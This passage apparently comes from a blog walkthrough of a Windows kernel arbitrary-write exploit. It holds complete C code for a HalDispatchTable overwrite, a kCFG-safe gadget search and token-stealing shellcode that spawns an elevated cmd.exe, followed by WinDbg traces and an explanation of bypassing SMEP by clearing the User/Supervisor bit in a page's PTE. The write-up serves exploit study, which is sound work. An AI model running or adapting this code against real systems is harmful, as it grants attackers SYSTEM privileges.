    QWORD addressOfNameOrdinals = imageBase + addressOfNameOrdinalsRva;

    printf("[+] Export directory:        0x%llx\n", exportDirectory);
    printf("[+] NumberOfNames:           %lu\n", numberOfNames);

    for (DWORD i = 0; i < numberOfNames; i++)
    {
        DWORD nameRva = ReadDWORD(
            hDevice,
            addressOfNames + (i * sizeof(DWORD))
        );

        QWORD nameAddress = imageBase + nameRva;

        char exportName[256] = { 0 };

        ReadKernelString(
            hDevice,
            nameAddress,
            exportName,
            sizeof(exportName)
        );

        if (strcmp(exportName, targetExport) == 0)
        {
            WORD ordinal = ReadWORD(
                hDevice,
                addressOfNameOrdinals + (i * sizeof(WORD))
            );

            DWORD functionRva = ReadDWORD(
                hDevice,
                addressOfFunctions + (ordinal * sizeof(DWORD))
            );

            QWORD functionAddress = imageBase + functionRva;

            printf("[+] Found export:            %s\n", exportName);
            printf("[+] Export ordinal:          %u\n", ordinal);
            printf("[+] Export RVA:              0x%lx\n", functionRva);
            printf("[+] Export address:          0x%llx\n", functionAddress);

            return functionAddress;
        }
    }

    printf("[-] Export not found: %s\n", targetExport);
    return 0;
}

QWORD ResolveHalDispatchTable(HANDLE hDevice, QWORD ntBase)
{
    QWORD halDispatchTable = 0;

    printf("[+] Trying dynamic HalDispatchTable export resolution...\n");

    halDispatchTable = ResolveKernelExport(
        hDevice,
        ntBase,
        "HalDispatchTable"
    );

    if (halDispatchTable)
    {
        printf("[+] Dynamic HalDispatchTable resolution succeeded\n");
        return halDispatchTable;
    }

    printf("[!] Dynamic HalDispatchTable resolution failed\n");
    printf("[!] Falling back to hardcoded WinDBG offset: 0x%llx\n",
        HALDISPATCHTABLE_FALLBACK_OFFSET
    );

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    printf("[+] Fallback HalDispatchTable: 0x%llx\n", halDispatchTable);

    return halDispatchTable;
}

BOOL ReadKernelBytes(
    HANDLE hDevice,
    QWORD kernelAddress,
    BYTE* buffer,
    DWORD length
)
{
    if (!buffer || length == 0)
    {
        return FALSE;
    }

    for (DWORD i = 0; i < length; i++)
    {
        buffer[i] = ReadBYTE(hDevice, kernelAddress + i);
    }

    return TRUE;
}

void ReadSectionName(
    HANDLE hDevice,
    QWORD sectionHeader,
    char* nameBuffer,
    DWORD nameBufferSize
)
{
    if (!nameBuffer || nameBufferSize == 0)
    {
        return;
    }

    ZeroMemory(nameBuffer, nameBufferSize);

    DWORD maxName = min(8, nameBufferSize - 1);

    for (DWORD i = 0; i < maxName; i++)
    {
        nameBuffer[i] = (char)ReadBYTE(hDevice, sectionHeader + i);
    }

    nameBuffer[maxName] = '\0';
}

QWORD FindJmpRbxGadget(HANDLE hDevice, QWORD imageBase)
{
    WORD mz = ReadWORD(hDevice, imageBase);

    if (mz != 0x5A4D)
    {
        printf("[-] Invalid MZ header while searching for gadget\n");
        return 0;
    }

    DWORD e_lfanew = ReadDWORD(hDevice, imageBase + 0x3c);
    QWORD ntHeaders = imageBase + e_lfanew;

    DWORD peSignature = ReadDWORD(hDevice, ntHeaders);

    if (peSignature != 0x00004550)
    {
        printf("[-] Invalid PE signature while searching for gadget\n");
        return 0;
    }

    QWORD fileHeader = ntHeaders + 0x4;

    WORD numberOfSections = ReadWORD(hDevice, fileHeader + 0x2);
    WORD sizeOfOptionalHeader = ReadWORD(hDevice, fileHeader + 0x10);

    QWORD optionalHeader = ntHeaders + 0x18;
    QWORD firstSectionHeader = optionalHeader + sizeOfOptionalHeader;

    printf("[+] Searching executable sections for jmp rbx gadget...\n");
    printf("[+] Number of sections:      %u\n", numberOfSections);

    for (WORD i = 0; i < numberOfSections; i++)
    {
        QWORD sectionHeader = firstSectionHeader + ((QWORD)i * 0x28);

        char sectionName[9] = { 0 };
        ReadSectionName(hDevice, sectionHeader, sectionName, sizeof(sectionName));

        DWORD virtualSize = ReadDWORD(hDevice, sectionHeader + 0x8);
        DWORD virtualAddress = ReadDWORD(hDevice, sectionHeader + 0xC);
        DWORD characteristics = ReadDWORD(hDevice, sectionHeader + 0x24);

        if (!(characteristics & IMAGE_SCN_MEM_EXECUTE))
        {
            continue;
        }

        QWORD sectionStart = imageBase + virtualAddress;
        QWORD sectionEnd = sectionStart + virtualSize;

        printf("[+] Scanning section %-8s 0x%llx - 0x%llx\n",
            sectionName,
            sectionStart,
            sectionEnd
        );

        for (QWORD current = sectionStart; current < sectionEnd - 1; current++)
        {
            BYTE b1 = ReadBYTE(hDevice, current);
            BYTE b2 = ReadBYTE(hDevice, current + 1);

            if (b1 == JMP_RBX_BYTE_1 && b2 == JMP_RBX_BYTE_2)
            {
                printf("[+] Found possible jmp rbx gadget: 0x%llx\n", current);
                printf("[+] Gadget offset from nt base:    0x%llx\n", current - imageBase);

                return current;
            }
        }
    }

    printf("[-] No jmp rbx gadget found\n");
    return 0;
}

QWORD GetKernelBaseAddress(LPCWSTR driverName)
{
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[-] EnumDeviceDrivers failed. Error=%lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH] = { 0 };

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    return 0;
}

unsigned char shellcode[] = {
    0x9c, 0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41,
    0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41,
    0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x65,
    0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48,
    0x89, 0xc3, 0x49, 0x89, 0xc4, 0x4d, 0x8b, 0xa4,
    0x24, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xec,
    0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0xac, 0x24,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xfd, 0x04,
    0x75, 0xe3, 0x4d, 0x8b, 0xac, 0x24, 0xb8, 0x04,
    0x00, 0x00, 0x49, 0x83, 0xe5, 0xf0, 0x4c, 0x8b,
    0xb3, 0xb8, 0x04, 0x00, 0x00, 0x49, 0x83, 0xe6,
    0x0f, 0x4d, 0x09, 0xf5, 0x4c, 0x89, 0xab, 0xb8,
    0x04, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
    0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41,
    0x59, 0x41, 0x58, 0x5d, 0x5f, 0x5e, 0x5a, 0x59,
    0x5b, 0x9d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3
};

int main()
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    LPVOID shellcodeAddress = NULL;

    QWORD ntBase = 0;
    QWORD halDispatchTable = 0;
    QWORD halDispatchEntry = 0;
    QWORD originalHalEntry = 0;
    QWORD verifyHalEntry = 0;
    QWORD restoredHalEntry = 0;
    QWORD jmpRbxGadget = 0;

    HMODULE ntdll = NULL;
    NtQueryIntervalProfile_t NtQueryIntervalProfile = NULL;

    ULONG interval = 0;
    NTSTATUS status = 0;

    BOOL halOverwritten = FALSE;

    printf("[+] Opening device: %ls\n", DEVICE_NAME);

    hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    ntBase = GetKernelBaseAddress(L"ntoskrnl.exe");

    if (!ntBase)
    {
        ntBase = GetKernelBaseAddress(L"ntkrnlmp.exe");
    }

    if (!ntBase)
    {
        printf("[-] Failed to find ntoskrnl.exe / ntkrnlmp.exe base\n");
        goto cleanup;
    }

    printf("[+] nt base:                 0x%llx\n", ntBase);

    halDispatchTable = ResolveHalDispatchTable(hDevice, ntBase);

    if (!halDispatchTable)
    {
        printf("[-] Failed to resolve HalDispatchTable\n");
        goto cleanup;
    }

    halDispatchEntry = halDispatchTable + HAL_ENTRY_OFFSET;

    printf("[+] HalDispatchTable:        0x%llx\n", halDispatchTable);
    printf("[+] HalDispatchTable + 0x8:  0x%llx\n", halDispatchEntry);

    shellcodeAddress = VirtualAlloc(
        NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!shellcodeAddress)
    {
        printf("[-] VirtualAlloc failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    memcpy(shellcodeAddress, shellcode, sizeof(shellcode));

    printf("[+] Shellcode address:       0x%p\n", shellcodeAddress);

    ntdll = GetModuleHandleA("ntdll.dll");

    if (!ntdll)
    {
        printf("[-] GetModuleHandleA(ntdll.dll) failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    NtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(
            ntdll,
            "NtQueryIntervalProfile"
        );

    if (!NtQueryIntervalProfile)
    {
        printf("[-] Failed to resolve NtQueryIntervalProfile. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    originalHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    if (!originalHalEntry)
    {
        printf("[-] Failed to read original HalDispatchTable entry\n");
        goto cleanup;
    }

    printf("[+] Original HAL entry:      0x%llx\n", originalHalEntry);

    jmpRbxGadget = FindJmpRbxGadget(hDevice, ntBase);

    if (!jmpRbxGadget)
    {
        printf("[-] Failed to find jmp rbx gadget dynamically\n");
        goto cleanup;
    }

    printf("[+] JMP RBX gadget:          0x%llx\n", jmpRbxGadget);

    printf("[+] Overwriting HalDispatchTable + 0x8...\n");

    if (!WriteQWORD(
        hDevice,
        halDispatchEntry,
        jmpRbxGadget
    ))
    {
        printf("[-] Failed to overwrite HalDispatchTable entry\n");
        goto cleanup;
    }

    halOverwritten = TRUE;

    verifyHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after write:   0x%llx\n", verifyHalEntry);

    if (verifyHalEntry != jmpRbxGadget)
    {
        printf("[-] HAL entry verification failed\n");
        goto cleanup;
    }

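    printf("[+] Triggering NtQueryIntervalProfile...\n");

    // Debugging aid: breaks into an attached debugger right before the trigger.
    // Remove it when no debugger is attached, otherwise the process dies here
    // with the HAL entry still overwritten.
    __debugbreak();

    // The shellcode address is passed as the Interval pointer so that it is
    // in RBX when the overwritten HAL entry (jmp rbx) is called.
    status = NtQueryIntervalProfile(
        ProfileTotalIssues,
        (PULONG)shellcodeAddress
    );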

    printf("[+] NtQueryIntervalProfile returned: 0x%lx\n", status);

    printf("[+] Restoring original HAL entry...\n");

    if (!WriteQWORD(hDevice, halDispatchEntry, originalHalEntry))
    {
        printf("[-] Failed to restore original HAL entry\n");
        goto cleanup;
    }

    halOverwritten = FALSE;

    restoredHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after restore: 0x%llx\n", restoredHalEntry);

    if (restoredHalEntry == originalHalEntry)
    {
        printf("[+] HAL entry restored successfully\n");
    }
    else
    {
        printf("[!] HAL entry restore verification mismatch\n");
    }

    printf("[+] Spawning cmd.exe\n");
    system("cmd.exe");

cleanup:

    if (halOverwritten && originalHalEntry)
    {
        printf("[!] Attempting emergency HAL entry restore...\n");
        WriteQWORD(hDevice, halDispatchEntry, originalHalEntry);
    }

    if (shellcodeAddress)
    {
        VirtualFree(shellcodeAddress, 0, MEM_RELEASE);
    }

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
    }

    return 0;
}

Running it works as expected.

SMEP: The Sequel Nobody Asked For

The VM used for testing so far did not have SMEP enabled. What happens if we run the same exploit in a VM with SMEP?

One thing to note: dynamically locating the gadget and HalDispatchTable was taking a long time and freezing the VM. The problem is ReadBYTE. Every byte costs one IOCTL, so walking the export table and scanning ntoskrnl.exe byte by byte means thousands of IOCTL calls. I’ll find a way to fix this later, maybe by narrowing the search to a specific region, just not now. I’m hardcoding the addresses for now. I’m also using a hardware breakpoint (ba e 1) instead of a regular breakpoint at the RVA, because I was having trouble breaking at the right instruction.
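One possible way to cut down the IOCTL count, sketched here and not what the exploit currently does, is to consume all 8 bytes of each read instead of one. The names below (read_qword_fn, scan_jmp_rbx, mock_memory, mock_read_qword) are hypothetical; in the exploit, the callback role would be played by ReadQWORD, and the mock only exists so the sketch can run in user mode.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical reader callback: returns the 8 bytes at `address` as a
   little-endian QWORD. One call corresponds to one IOCTL. */
typedef uint64_t (*read_qword_fn)(void *ctx, uint64_t address);

/* Scan [start, end) for FF E3 using one read per 8 bytes. `start` is
   assumed to be 8-byte aligned. The last read may fetch up to 7 bytes
   past `end`; those bytes are read but never matched.
   Returns the gadget address, or 0 if none is found. */
static uint64_t scan_jmp_rbx(read_qword_fn read_qword, void *ctx,
                             uint64_t start, uint64_t end)
{
    uint8_t prev = 0;      /* byte seen at the previous address */
    int have_prev = 0;     /* becomes 1 once `prev` is meaningful */

    for (uint64_t addr = start; addr < end; addr += 8) {
        uint64_t chunk = read_qword(ctx, addr);

        for (unsigned i = 0; i < 8 && addr + i < end; i++) {
            uint8_t cur = (uint8_t)(chunk >> (i * 8));
            if (have_prev && prev == 0xFF && cur == 0xE3)
                return addr + i - 1;   /* address of the FF byte */
            prev = cur;
            have_prev = 1;
        }
    }
    return 0;
}

/* Stand-in for kernel memory so the sketch can run in user mode. */
struct mock_memory {
    const uint8_t *bytes;  /* backing buffer */
    uint64_t base;         /* pretend virtual address of bytes[0] */
    unsigned reads;        /* number of simulated IOCTLs */
};

static uint64_t mock_read_qword(void *ctx, uint64_t address)
{
    struct mock_memory *mem = (struct mock_memory *)ctx;
    const uint8_t *p = mem->bytes + (address - mem->base);
    uint64_t value = 0;

    mem->reads++;
    for (unsigned i = 0; i < 8; i++)
        value |= (uint64_t)p[i] << (i * 8);
    return value;
}
```

The loop in FindJmpRbxGadget calls ReadBYTE twice per position, which is two IOCTLs per byte scanned. This version issues one read per 8 bytes and carries the last byte across chunk boundaries, so a gadget split between two reads is still found.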

Running this we see the following in WinDBG

0: kd> ba e 1 nt+0x44584a
0: kd> g
Breakpoint 0 hit
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`51c4584a ffe3            jmp     rbx
1: kd> r
rax=fffff80251c4584a rbx=0000018bd6b70000 rcx=0000000000000001
rdx=0000000000000018 rsi=0000000000000048 rdi=0000000000000001
rip=fffff80251c4584a rsp=fffffc8096f17a68 rbp=fffffc8096f17b80
 r8=fffffc8096f17aa0  r9=fffffc8096f17ad0 r10=0000fffff80251c4
r11=ffff9bf924400000 r12=00007fff6626ffc0 r13=fffff80251c4584a
r14=fffff80252400a68 r15=fffff8025218f9d0
iopl=0         nv up ei pl nz ac po cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040213
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`51c4584a ffe3            jmp     rbx {0000018b`d6b70000}
1: kd> u @rip L1
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`51c4584a ffe3            jmp     rbx
1: kd> ? @cr4 & 100000
Evaluate expression: 1048576 = 00000000`00100000
1: kd> !pte @rbx
                                           VA 0000018bd6b70000
PXE at FFFF824120904018    PPE at FFFF824120803178    PDE at FFFF82410062F5A8    PTE at FFFF8200C5EB5B80
contains 0A000000B4D1B867  contains 0A000000B9C1C867  contains 0A000000ABA1D867  contains 00000000B099D867
pfn b4d1b     ---DA--UWEV  pfn b9c1c     ---DA--UWEV  pfn aba1d     ---DA--UWEV  pfn b099d     ---DA--UWEV

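What does this mean? It means the control-flow part of our exploit is working. The breakpoint hit on our gadget, so RIP is at the jmp rbx instruction as we wanted, and RBX holds our user-mode shellcode address. The CR4 check shows bit 20 set, which means SMEP is enabled, and !pte shows the shellcode page with the U (user) bit set.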

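Stepping into the gadget at runtime, we see the following (this capture is from a different boot, so the addresses differ from the output above):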

1: kd> t
0000026b`e6730000 9c              pushfq
1: kd> r
rax=fffff8056b24584a rbx=0000026be6730000 rcx=0000000000000001
rdx=0000000000000018 rsi=000000000000009c rdi=0000000000000001
rip=0000026be6730000 rsp=fffff50a22e3ea68 rbp=fffff50a22e3eb80
 r8=fffff50a22e3eaa0  r9=fffff50a22e3ead0 r10=0000fffff8056b24
r11=ffffa378ef800000 r12=00007ffe3a2effc0 r13=fffff8056b24584a
r14=fffff8056ba00a68 r15=fffff8056b78f9d0
iopl=0         nv up ei pl nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040217
0000026b`e6730000 9c              pushfq

Note that RIP now contains our user-mode shellcode address, but CS is 0010, which is the kernel-mode code segment. So the CPU is about to execute a user-mode page at CPL 0, which is exactly what SMEP is supposed to block.
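If you want to read those two facts off the register dump mechanically, a small sketch looks like this. The helper names are hypothetical. The privilege level is the low two bits of the CS selector, and the user half of the address space has the top address bit clear.

```c
#include <stdint.h>

/* The current privilege level is encoded in the low two bits of CS. */
static unsigned cpl_from_cs(uint16_t cs)
{
    return cs & 0x3u;
}

/* Returns 1 if the address lies in the lower (user) half of the
   64-bit address space, 0 otherwise. */
static int is_user_half(uint64_t va)
{
    return (va >> 63) == 0;
}
```

For the dump above, cs=0010 gives CPL 0, and rip=0000026be6730000 is a user-half address. For comparison, 64-bit user-mode code on Windows normally runs with cs=0033, which gives CPL 3.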

1: kd> t
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc
                       (0x0000026BE6730000,0x000000002D0BD867,0xFFFFF50A22E3E8D0,0x0000000080000005)

WARNING: This break is not a step/trace completion.
The last command has been cleared to prevent
accidental continuation of this unrelated event.
Check the event, location and thread before resuming.
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`6b206f80 cc              int     3

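Recall that bugcheck 0xFC is ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY. The first parameter (0x0000026BE6730000) is the address the CPU tried to execute, which is our shellcode page, and the second is the PTE contents for that address. In other words, SMEP is blocking the execution.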

PTEs: Gaslighting SMEP

I’ll be honest. I don’t fully understand the structure. It all makes my mind hurt. But this is explained much better here and here.

In the previous stack overflow exploit, SMEP was handled with a ROP chain. Since we controlled the stack, the solution was straightforward: build a small chain that loaded a modified CR4 value and executed a mov cr4, reg gadget. That cleared bit 20 of CR4, disabling SMEP globally, and then execution could safely continue into user-mode shellcode.
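As a reminder of what that ROP chain computed, here is the bit arithmetic on its own. The helper names are hypothetical and the CR4 value in the usage note is only illustrative, not one captured in this post.

```c
#include <stdint.h>

#define CR4_SMEP_BIT 20   /* CR4 bit 20 enables SMEP */

/* Returns nonzero if SMEP is enabled in the given CR4 value. */
static int smep_enabled(uint64_t cr4)
{
    return (cr4 & (1ULL << CR4_SMEP_BIT)) != 0;
}

/* Returns the CR4 value with only the SMEP bit cleared. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~(1ULL << CR4_SMEP_BIT);
}
```

For an illustrative CR4 of 0x3506f8, cr4_without_smep returns 0x2506f8. This is the same bit that `? @cr4 & 100000` tests in WinDbg.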

That approach made sense for a stack overflow because the vulnerability naturally gave us stack control. We had room for a chain: gadget, value, gadget, shellcode address, and so on.

The arbitrary write primitive is different. Here, we are not starting with a controlled stack. We have something even more direct: the ability to read and write kernel memory. So instead of building a ROP chain to disable SMEP, we can attack the page metadata itself. This is where Page Table Entry overwrite comes in.

When SMEP blocked our exploit, the failure was very clear. The kCFG bypass worked. The overwritten HalDispatchTable+0x8 entry reached a valid ntoskrnl.exe gadget, and that gadget executed jmp rbx. At that moment, RBX contained the address of our shellcode. After stepping over the gadget, RIP pointed directly at the user-mode shellcode page while CS=0010, meaning the CPU was still executing in kernel mode. The crash happened only when the CPU tried to execute code from that user page.

So kCFG was not the blocker anymore. SMEP was. The reason SMEP complained is that our shellcode lived in a user-mode page. WinDBG’s !pte output showed the U bit set, meaning the page was marked as user-accessible. SMEP sees that and says: kernel mode is not allowed to execute this page.

Instead of disabling SMEP globally, we can make the shellcode page look like supervisor memory. We do that by finding the shellcode page’s PTE and clearing the User/Supervisor bit, bit 2.

The virtual address of the shellcode does not change. The shellcode bytes do not change. The kCFG bypass does not change. The only thing that changes is the page-table metadata describing that address.

Before the overwrite, the page looks like this conceptually:

Shellcode VA → PTE says: valid, writable, executable, user page

After the overwrite:

Shellcode VA → PTE says: valid, writable, executable, supervisor page

Now when the same jmp rbx gadget transfers execution to the shellcode, SMEP no longer treats the target as a user-mode page. We did not turn SMEP off. We simply changed the page so that SMEP’s own rules allow execution.
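The edit itself is a single bit operation. A minimal sketch, using the PTE value from the !pte output earlier (0x00000000B099D867) as the worked example; pte_make_supervisor is a hypothetical helper name:

```c
#include <stdint.h>

#define PTE_USER (1ULL << 2)   /* User/Supervisor bit */

/* Returns the PTE value with the User/Supervisor bit cleared, so the
   page is treated as a supervisor page. All other bits are preserved. */
static uint64_t pte_make_supervisor(uint64_t pte)
{
    return pte & ~PTE_USER;
}
```

The low byte 0x67 becomes 0x63, so 0x00000000B099D867 turns into 0x00000000B099D863. The physical frame number and the valid, write and NX bits are untouched.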

That is why PTE overwrite fits this vulnerability better than CR4 flipping. A stack overflow gives us ROP. A write-what-where gives us direct reads and writes of kernel memory. So instead of fighting SMEP through a ROP chain, we use our arbitrary write to edit the shellcode page’s PTE directly.

The exploit flow now becomes:

Allocate user-mode shellcode.
Resolve nt base.
Resolve HalDispatchTable+0x8.
Find a valid kCFG-safe jmp rbx gadget in ntoskrnl.exe.
Resolve the PTE base using MiGetPteAddress-style logic.
Calculate the shellcode page’s PTE.
Read the original PTE.
Clear the U/S bit.
Write the modified PTE back.
Overwrite HalDispatchTable+0x8 with the jmp rbx gadget.
Trigger NtQueryIntervalProfile.
Execution reaches the kernel gadget, jumps to shellcode, and SMEP no longer blocks it.
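The two PTE steps in the flow above (resolve the PTE base, then calculate the shellcode page’s PTE) come down to one line of arithmetic, following the shift and mask that MiGetPteAddress uses. This is a sketch under one assumption: the PTE base in the usage note (0xFFFF820000000000) is inferred from the earlier !pte output for that particular boot, and it is randomized, so a real exploit has to read it at runtime. pte_address is a hypothetical helper name.

```c
#include <stdint.h>

/* MiGetPteAddress-style calculation: shift the virtual address right by 9,
   mask it down to an 8-byte-aligned index, and add the PTE base. */
static uint64_t pte_address(uint64_t va, uint64_t pte_base)
{
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}
```

Checking it against the earlier WinDbg output: for VA 0x0000018bd6b70000 with a base of 0xFFFF820000000000, the result is 0xFFFF8200C5EB5B80, which matches the "PTE at" value that !pte printed.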

This is the important mental shift: in the stack overflow exploit, we bypassed SMEP by changing the CPU control register. In the arbitrary write exploit, we bypass SMEP by changing how the memory page is classified.

Making Userland Look Like It Belongs Here

At this point in the exploit, kCFG was no longer the blocker. We had already proven that the overwritten HalDispatchTable+0x8 entry reached a valid kernel gadget:

HalDispatchTable+0x8 → nt!jmp rbx

The gadget executed in kernel mode, and RBX contained the address of our user-mode shellcode. The problem happened after the gadget executed. jmp rbx moved RIP to the user-mode shellcode page while the CPU was still running in kernel mode. Since SMEP was enabled, the processor refused to execute that user page and crashed with bugcheck 0xFC.

So the control-flow part was working:

kCFG bypass: working
jmp rbx gadget: working
RBX points to shellcode: working
SMEP: blocking execution

The fix is not to remove the kCFG bypass. The fix is to change how the shellcode page is viewed by the CPU. SMEP blocks kernel-mode execution from pages marked as user pages. That marking lives in the page table. More specifically, it lives in the Page Table Entry, or PTE, for the virtual address we want to execute.

A PTE is an 8-byte structure used by the CPU’s paging mechanism. It maps a virtual page to a physical page and stores permission bits for that mapping. Those bits describe things like whether the page is valid, writable, user-accessible, or non-executable.

For this exploit, the important PTE bits are:

Bit 0  - Valid / Present
Bit 1  - Writeable
Bit 2  - User / Supervisor
Bit 63 - NX / No Execute

The bit we care about for SMEP is bit 2, the User/Supervisor bit. When bit 2 is set, the page is a user page:

PTE bit 2 = 1 → user page

When bit 2 is clear, the page is a supervisor page:

PTE bit 2 = 0 → supervisor/kernel page

SMEP does not simply look at the numeric address and say, “this looks like userland.” It checks the page-table permissions. If the CPU is executing in kernel mode and the target page is marked as user, SMEP blocks it.

That gives us a nice workaround. Instead of disabling SMEP globally by flipping CR4 bit 20, we modify the PTE for our shellcode page and clear the User/Supervisor bit. Now, when the same jmp rbx gadget transfers execution to the shellcode page, SMEP no longer blocks it because the page is no longer marked as a user page.
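
Why is clearing the bit in the PTE alone enough, when the upper paging levels still say "user"? On x64, an address only counts as a user-mode address if the U/S bit is set in every paging-structure entry that maps it. A minimal sketch of that rule follows. The function names are hypothetical, `uint64_t` stands in for `QWORD`, and the first three sample values in the note are the PXE/PPE/PDE entries from the `!pte` output shown at the end of this post.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PTE_USER_SUPERVISOR_BIT 0x4ULL  /* bit 2, same value the exploit uses */

/* An address is a user-mode address only if U/S is set in every
 * paging-structure entry (PXE, PPE, PDE, PTE) that maps it. */
static bool is_user_mode_address(const uint64_t entries[], int levels)
{
    assert(levels > 0);

    for (int i = 0; i < levels; i++) {
        if (!(entries[i] & PTE_USER_SUPERVISOR_BIT)) {
            return false;  /* a single supervisor entry is enough */
        }
    }
    return true;
}

/* SMEP only objects to a kernel-mode instruction fetch from a user-mode address. */
static bool smep_blocks_fetch(bool cpu_in_kernel_mode,
                              const uint64_t entries[], int levels)
{
    return cpu_in_kernel_mode && is_user_mode_address(entries, levels);
}
```

Feeding it `{0x0A00000038D9C867, 0x0A00000038D9D867, 0x0A00000038D9E867, 0x0000000038E1E863}` reports that SMEP would not block the fetch, because the last entry has bit 2 clear even though the three above it do not.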

To calculate the PTE address for a virtual address, we need the Windows PTE base. In WinDbg, this value can be found in two places:

nt!MmPteBase
nt!MiGetPteAddress+0x13

MiGetPteAddress is especially useful because it contains the exact logic Windows uses to calculate the PTE address for a virtual address. The disassembly looked like this:

nt!MiGetPteAddress:
shr rcx, 9
mov rax, 7FFFFFFFF8h
and rcx, rax
mov rax, 0FFFF858000000000h
add rax, rcx
ret

Translated into C, that logic is:

  
PTE = PteBase + ((VirtualAddress >> 9) & 0x7FFFFFFFF8);

So the code adds this helper:

  
QWORD GetPteAddress(QWORD virtualAddress, QWORD pteBase)
{
    return pteBase + ((virtualAddress >> 9) & 0x7FFFFFFFF8ULL);
}
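
To make the arithmetic concrete, here is a portable restatement of the helper with a worked example. It is a sketch: `uint64_t` replaces `QWORD`, the function name is hypothetical, and the PTE base `0xFFFFA90000000000` is inferred from the `!pte` output at the end of this post (it is a different boot from the `0xFFFF858000000000` session).

```c
#include <assert.h>
#include <stdint.h>

/* Portable restatement of GetPteAddress. */
static uint64_t pte_address(uint64_t virtual_address, uint64_t pte_base)
{
    /* PTEs are 8 bytes, so the base is expected to be 8-byte aligned. */
    assert((pte_base & 0x7) == 0);

    /* ">> 12" would give the page number and "<< 3" would scale it by the
     * 8-byte PTE size. Together that is ">> 9" with the low 3 bits masked. */
    return pte_base + ((virtual_address >> 9) & 0x7FFFFFFFF8ULL);
}
```

For the shellcode address `0x000001ab4f1c0000`, the shift and mask give `0xD5A78E00`. Adding the inferred base gives `0xFFFFA900D5A78E00`, which matches the PTE address WinDbg reports for that page.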

The value 0xFFFF858000000000 is the PTE base on this target for this boot. Windows has randomized the PTE base at every boot since Windows 10 1607, so instead of hardcoding that full value, the exploit reads it from the live kernel using the arbitrary read primitive.
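
Why +0x13? The offset falls out of the instruction lengths: the second `mov rax, imm64` starts at +0x11, and its 8-byte immediate follows the two opcode bytes. The sketch below uses an assumed encoding of the listing above. The byte array is a hypothetical reconstruction, not a dump from the target, and `read_imm64` is a name made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed encoding of the MiGetPteAddress listing (hypothetical bytes). */
static const uint8_t mi_get_pte_address[] = {
    0x48, 0xC1, 0xE9, 0x09,                   /* +0x00 shr rcx, 9           */
    0x48, 0xB8,                               /* +0x04 mov rax, imm64       */
    0xF8, 0xFF, 0xFF, 0xFF, 0x7F, 0x00, 0x00, 0x00,
    0x48, 0x23, 0xC8,                         /* +0x0E and rcx, rax         */
    0x48, 0xB8,                               /* +0x11 mov rax, imm64       */
    0x00, 0x00, 0x00, 0x00, 0x80, 0x85, 0xFF, 0xFF, /* +0x13 the PTE base   */
    0x48, 0x03, 0xC1,                         /* +0x1B add rax, rcx         */
    0xC3                                      /* +0x1E ret                  */
};

/* Assemble a little-endian 64-bit immediate byte by byte, so the result
 * does not depend on the endianness of the machine running the sketch. */
static uint64_t read_imm64(const uint8_t *code, size_t size, size_t offset)
{
    uint64_t value = 0;

    assert(offset + 8 <= size);
    for (int i = 7; i >= 0; i--) {
        value = (value << 8) | code[offset + (size_t)i];
    }
    return value;
}
```

Calling `read_imm64(mi_get_pte_address, sizeof(mi_get_pte_address), 0x13)` on these bytes yields `0xFFFF858000000000`. In the exploit, the same 8 bytes come back from a single `ReadQWORD` at `nt + 0x298793`.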

The WinDbg values were:

nt!MiGetPteAddress+0x13 - nt = 0x298793
nt!MmPteBase - nt             = 0xCFB358

